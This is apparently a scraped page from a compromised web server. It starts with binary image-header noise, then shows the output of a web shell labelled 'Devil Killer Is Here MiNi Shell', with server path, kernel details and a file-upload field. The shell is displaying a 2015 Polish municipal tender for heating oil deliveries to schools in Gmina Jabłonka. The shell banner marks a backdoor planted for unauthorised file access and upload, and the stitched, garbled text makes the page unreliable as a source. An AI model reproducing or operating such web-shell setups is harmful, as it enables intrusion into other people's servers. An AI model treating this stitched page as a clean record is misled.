JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151125/173397-N-2015.html

<p class="kh_header"><b>Jabłonka: Dostawa lekkiego oleju opałowego w roku 2016 dla potrzeb szkół Gminy Jabłonka</b><br>
<b>Numer ogłoszenia: 173397 - 2015; data zamieszczenia: 25.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jabłonka , ul. 3 Maja 1/206, 34-480 Jabłonka, woj. małopolskie, tel. 018 2611146, faks 018 2652468.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jablonka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.jablonka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa lekkiego oleju opałowego w roku 2016 dla potrzeb szkół Gminy Jabłonka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są sukcesywne dostawy lekkiego oleju opałowego w ilości szacunkowej 213 000 litrów w roku 2016 dla potrzeb szkół Gminy Jabłonka, tj.: 
1) Zespołu Szkół w Jabłonce,
2) Zespołu Szkół w Lipnicy Małej,
3) Zespołu Szkół w Orawce,
4) Zespołu Szkół w Podwilku,
5) Zespołu Szkół w Zubrzycy Dolnej,
6) Zespołu Szkół w Zubrzycy Górnej
7) Szkoły Podstawowej Nr 1 w Lipnicy Małej,
8) Szkoły Podstawowej Nr 1 w Podwilku,
9) Orawskiej Samorządowej Szkoły Muzycznej I stopnia w Jabłonce

2. Lekki olej opałowy musi charakteryzować się następującymi parametrami fizyko-chemicznymi:
 gęstość w temperaturze 15 C, nie wyższa niż 0,860 g/ml
 temperatura zapłonu, nie niższa niż 56 o C
 lepkość kinematyczna w temperaturze 20oC, nie większa niż 6,00 mm2/s
 skład frakcyjny:
 do 250oC destyluje nie więcej niż 65%/V/V
 do 350oC destyluje nie mniej niż 85%/V/V
 zawartość siarki nie więcej niż 0,10%/m/m
 pozostałość po koksowaniu w 10% pozostałości 
 destylacyjnej, nie większa niż 0,3%/m/m
 pozostałość po spopieleniu nie większa niż 0,01%/m/m
 zawartość wody nie większa niż 200 mg/kg
 zawartość stałych ciał obcych nie większa niż 24 mg/kg
 wartość opałowa nie niższa niż 42,6 MJ/kg
 temperatura płynięcia nie wyższa niż -20oC

3. Główny przedmiot 
 CPV-09135100-5 Olej opałowy

4. Zapotrzebowanie na olej opałowy przedstawia się następująco (harmonogram dostaw):

 Lp. Nazwa jednostki ilość termin dostawy
w m-cach
1. Zespół Szkół w Jabłonce                  	                                                     
                                                                   	

Zbiornik 15 000 litrów
Razem: 50 000 litrów                  
	10 000  l
10 000 l
10 000 l
10 000  l
10 000 l	Styczeń
luty
marzec
listopad
grudzień
2.	Zespół Szkół w Lipnicy						
                                                                      Zbiornik 8 000 litrów
Razem: 24 000 litrów
	6 000  l
6 000 l
6 000 l
6 000  l	Styczeń
kwiecień
październik
grudzień
3.	Zespół Szkół w Orawce	                   


Zbiornik 11 000 litrów
Razem: 11 000 litrów
	7 000   l


4 000  l	styczeń-kwiecień

październik-grudzień
4.		Zespół Szkół w Podwilku                
                                                                   	
                                                                   	
Zbiornik 8 000 litrów
Razem: 32 000 litrów
	6 000  l
6 000 l
4 000 l
4 000  l
6 000  l
6 000 l	Styczeń
luty
marzec
październik
listopad
grudzień
5.		Zespół Szkół w Zubrzycy Dolnej


Zbiornik 15 000 litrów
Razem: 27 000 litrów
	14 000  l


13 000  l	styczeń-kwiecień

październik-grudzień
6.		Zespół Szkół w Zubrzycy Górnej                                   

Zbiornik 16 000 litrów
Razem: 32 000 litrów                  
	20 000  l

12 000  l	styczeń-kwiecień

październik-grudzień
7.		Szkoła Podstawowa Nr 1 w Lipnicy Małej

Zbiornik 10 000 litrów
Razem: 16 000 litrów	8 000  l

8 000  l	luty

październik
8.		Szkoła Podstawowa Nr 1 w Podwilku      
                                                               		    Zbiornik 8 000 litrów
Razem: 9 000 litrów	5 000  l

4 000  l	styczeń-luty

listopad
9.		Orawska Samorządowa Szkoła Muzyczna I stopnia w Jabłonce 

Zbiornik 5 000 litrów
Razem: 12 000 litrów	3 000  l
3 000 l
3 000 l
3 000  l	styczeń
marzec
październik
grudzień
Razem:	213 000  l oleju opałowego

5.	Określenie powyższej ilości oleju są szacunkowe. Zamawiający będzie każdorazowo określał wielkości danej partii materiału. Zamawiający ma prawo zmienić ilości oleju w stosunku do ilości określonych w postępowaniu przetargowym. Faktyczna ilość zakupionego oleju będzie uzależniona od rzeczywistych potrzeb Zamawiającego. Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia zakresu ilościowego dostaw oleju w granicach 20 % w stosunku do ilości wykazanej w rozdziale 1 niniejszej SIWZ.
6.	Wykonawca wraz z dostawą przedłoży dokument potwierdzający pochodzenie i jakość dostarczonego oleju opałowego. Olej opałowy lekki musi spełniać wymagania jakościowe dot. zawartości siarki dla olejów oraz rodzajów instalacji i warunków, w których będą stosowane ciężkie oleje opałowe określone w Rozporządzeniu Ministra Gospodarki z dnia 4 stycznia 2007 roku (Dz. U. Nr 4 poz. 30) oraz odpowiednio normy PN-C-96024:2011.
7.	Faktury na ilość dostarczonego oleju opałowego będą wystawiane oddzielnie na każdą jednostkę objętą dostawą. Dane do faktury zawiera załącznik nr 7 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.13.51.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada koncesję na obrót paliwami</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek wiedzy i doświadczenia zostanie spełniony, jeśli wykaże się, realizację, co najmniej jednej dostawy oleju opałowego o minimalnej ilości 160 000 litrów w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie  - załącznik nr 5 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty przetargowej (Załącznik nr 1 do SIWZ);
2. Formularz cenowy (Załącznik nr 1a do SIWZ);
3. W przypadku Konsorcjum należy dołączyć szczegółową informację o Wykonawcach stanowiących Konsorcjum (Załącznik nr 2 do SIWZ) - jeśli dotyczy;
4. Pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i do zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentowania we właściwym rejestrze;
5. Oferta oraz wszystkie wymagane załączniki wymagają podpisu osób uprawnionych do reprezentowania Wykonawcy, zgodnie z wymaganiami ustawowymi. W przypadku, kiedy ofertę składa kilka podmiotów wspólnie, ofertę oraz wszystkie załączniki muszą być podpisane przez osoby uprawnione do reprezentowania każdego z podmiotów.
6. Wykonawcy wspólnie ubiegający się o udzielnie zamówienia winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego postępowania. Do oferty należy załączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo, o ile nie wynika to z innych dokumentów załączonych przez Wykonawcę.
7. Sposób oceny spełniania warunków udziału w postępowaniu: Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia - nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił w/w warunki.
8. Uzupełnienie wymaganych dokumentów jest możliwe po upływie terminu składania ofert na podstawie art. 26 ust. 3.
9. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: - wymagane w pkt III.4.2, III.4.4 niniejszej części dokumenty winien złożyć każdy Wykonawca.
 Pozostałe dokumenty wymagane w niniejszej części winny być złożone wspólnie przez Wykonawców
10. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi  zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
11. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt 10. odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
12. Wykonawca może występować tylko w jednej Ofercie, czy to indywidualnie czy też jako Partner Konsorcjum w odniesieniu do tego samego zadania inwestycyjnego. 
13. W celu potwierdzenia spełnienia opisanych wyżej warunków Wykonawca musi załączyć do oferty dokumenty określone w Rozdziale 12 SIWZ na podstawie, których zostanie dokonana ocena spełnienia warunków określonych w Rozdziale 11 SIWZ. 
14. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
15. Zamawiający wezwie w trybie art.26 ust.3 Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. 
16. Zamawiający zwróci się do wykonawcy o udzielenie w określonym terminie wyjaśnień
dotyczących powiązań, o których mowa w art. 24 ust. 2 pkt 5, istniejących między przedsiębiorcami, w celu ustalenia, czy zachodzą przesłanki wykluczenia wykonawcy. 
17. Zamawiający, oceniając wyjaśnienia, bierze pod uwagę obiektywne czynniki, w szczególności wpływ powiązań, o których mowa w art. 24 ust. 2 pkt 5, istniejących między przedsiębiorcami, na ich zachowania w postępowaniu oraz przestrzeganie zasady uczciwej konkurencji.
18. Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawców, którzy należąc do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie
konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), złożyli odrębne oferty w tym
samym postępowaniu, chyba że wykażą, że istniejące między nimi powiązania nie prowadzą do
zachwiania uczciwej konkurencji pomiędzy wykonawcami w postępowaniu o udzielenie zamówienia.
19. Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który nie
złożył wyjaśnień, oraz wykonawcę, który nie złożył listy, o której mowa w art. 26 ust. 2d</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin dostawy - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Możliwość dokonywania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy Zamawiający przewiduje tylko w następujących przypadkach:
- zmiana wynagrodzenia Wykonawcy spowodowana zmianą przepisów prawa podatkowego mająca wpływ na wysokość podatku VAT lub podatku akcyzowego. Jeśli w trakcie realizacji umowy nastąpiła urzędowa zmiana stawki podatku VAT, mająca wpływ na wysokość wynagrodzenia - Wykonawca skoryguje odpowiednio wynagrodzenie uwzględniając nową stawkę podatku VAT, zgodnie z przepisami obowiązującymi w dniu wystawienia stosownych dokumentów finansowych. W przypadku zmiany stawki podatku akcyzowego ceny jednostkowe będą mogły być skorygowane tylko i wyłącznie o kwotę, wynikającą z ww. zmiany. Strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za dostawy, których w dniu zmiany stawki podatku VAT i/lub stawki podatku akcyzowego jeszcze nie dokonano;
- zmiana podwykonawcy, przy pomocy, którego Wykonawca wykonuje przedmiot umowy;
- siły wyższej, w wyniku, której nie jest możliwe zachowanie przez Wykonawcę określonego umową terminu realizacja zamówienia publicznego.
- zmiany ceny w trakcie obowiązywania umowy będą następować w przypadku wzrostu lub spadku ceny jednostkowej 1000 litrów oleju opałowego u producenta, u którego zaopatruje się Wykonawca 
2. Zmiana może dotyczyć tylko tych postanowień umowy, na których treść mają wpływ okoliczności określone w opisanych powyżej przypadkach</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jablonka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jabłonka ul. 3 Maja 1, 34-480 Jabłonka, pok. 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2015 godzina 10:00, miejsce: Zespół Szkół w Jabłonce, 34-480 Jabłonka, ul. Piusa Jabłońskiego 4, sekretariat (I piętro). Otwarcie ofert nastąpi w siedzibie Zamawiającego, Gabinet Z-cy Dyrektora o godz. 10.05.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się następującymi kryteriami:

a) Cena (Kc) - 80 pkt
b) Termin dostawy (Kt) - 20 pkt

2. Zasady przyznawania punktów dla poszczególnych kryteriów:
a) Cena  Kc - kryterium temu przypisuje się wagę nie więcej niż 80 pkt.

Kryterium ceny dotyczy ceny brutto określonej w kolumnie 7 formularza cenowego, wyrażonej w złotych polskich.
Liczba punktów jaką otrzyma każda z ofert zostanie ustalona w następujący sposób:

 oferta, która zawiera najniższą cenę otrzyma maksymalną liczbę punktów przewidzianą dla tego kryterium (80pkt)
 ilość punktów jaką otrzymają pozostałe oferty zostanie ustalona wg wzoru: Kc=(Cn/Cb)x80 
Gdzie:
Kc - ilość punktów przyznanych Wykonawcy 
Cn - najniższa zaoferowana cena, spośród wszystkich ofert nie podlegających odrzuceniu 
Cb - cena zaoferowana w ofercie badanej 

b) Termin dostawy Kt - kryterium temu przypisuje się wagę nie więcej niż 20 pkt
Kryterium termin dostawy dotyczy określonego w formularzu oferty maksymalnego terminu dostawy każdej partii oleju opałowego wyrażonego w pełnych dniach roboczych. Termin realizacji dostawy liczony od chwili zgłoszenia zapotrzebowania przez Zamawiającego.  Zgłoszenia będą przekazywane dostawcy w godzinach od 8.00 - 14.00   
Liczba punktów jaką otrzyma każda z ofert zostanie ustalona w następujący sposób:
 oferta która zawiera najkrótszy termin dostawy otrzyma maksymalną liczbę punktów przewidzianą dla tego kryterium (20 pkt)
 ilość punktów jaką otrzymają pozostałe oferty zostanie ustalona wg wzoru: Kt=(Tn/Tb)x20 
Gdzie:
Kt - ilość punktów przyznanych Wykonawcy 
Tn - najkrótszy termin dostawy spośród wszystkich ofert nie podlegających odrzuceniu
Tb - termin dostawy określony w ofercie badanej 
3. Łączna ilość punktów (W) jaką otrzyma oferta, zostanie ustalona w następujący sposób:
W = Kc + Kt
4. Zamawiający udzieli zamówienia Wykonawcy, który uzyska najwyższą liczbę punktów.
5. Ocena ofert dokonywana będzie z dokładnością do dwóch miejsc po przecinku.

Do kontaktowania się z Wykonawcami Zamawiający upoważnia: 
 Pani Anna Dworszczak, tel./fax. 182652310 lub 182652900, e-mail: SPJablonka1@poczta.fm
 Pani Barbara Smolarek, tel. 182611153, e-mail: zeas@jablonka.pl.</p>
